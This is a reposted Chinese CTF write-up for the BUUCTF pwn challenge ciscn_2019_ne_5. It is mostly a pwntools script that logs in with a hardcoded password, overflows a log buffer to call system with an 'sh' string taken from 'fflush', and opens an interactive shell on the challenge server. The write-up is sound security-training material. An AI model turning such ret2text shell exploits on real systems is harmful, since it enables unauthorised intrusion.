ciscn_2019_ne_5

本文轉載自查看原文 2020-02-04 09:56 187 BUUCTF

ret2text類型

從fflush中獲取 “sh” 傳參給system即可

腳本如下

from pwn import *

r=remote('node3.buuoj.cn',25488)
e=ELF('ciscn_2019_ne_5')
sys_plt=e.plt['system']
sh_addr=0x80482ea

r.recvuntil('Please input admin password:')
r.sendline('administrator')

r.recvuntil('0.Exit\n:')
r.sendline('1')

payload='a'*0x4c+p32(sys_plt)+'aaaa'+p32(sh_addr)
r.recvuntil('Please input new log info:')
r.sendline(payload)

r.recvuntil('0.Exit\n:')
r.sendline('4')

r.interactive()

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 ciscn_2019_ne_5 ciscn_2019_c_1 1 ciscn_2019_n_1 ciscn_2019_n_1 ciscn_2019_c_1 ciscn_2019_final_2 [CISCN 2019 初賽]Love Math BUUCTF | ciscn_2019_c_1 &pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2& BUUCTF-ciscn_2019_c_1（20/100）